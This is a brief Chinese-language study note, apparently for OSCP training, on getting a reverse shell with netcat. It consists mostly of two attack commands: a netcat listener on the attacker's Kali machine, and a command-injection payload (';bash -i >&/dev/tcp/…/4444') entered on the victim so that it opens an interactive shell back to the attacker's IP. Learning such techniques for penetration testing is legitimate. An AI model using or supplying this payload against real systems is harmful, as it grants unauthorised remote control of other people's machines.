# Reverse Shell https://blog.puckwang.com/posts/2021/bind_shell_and-reverse_shell_with_netcat/ 利用 reverse shell * 在攻擊端 kail 上,輸入 `nc -lvp 4444` * 在被攻擊端輸入 `;bash -i >&/dev/tcp/192.168.43.119/4444 ![](https://i.imgur.com/UFJm1Oa.png) ###### tags: `reverse shell` `command` `oscp`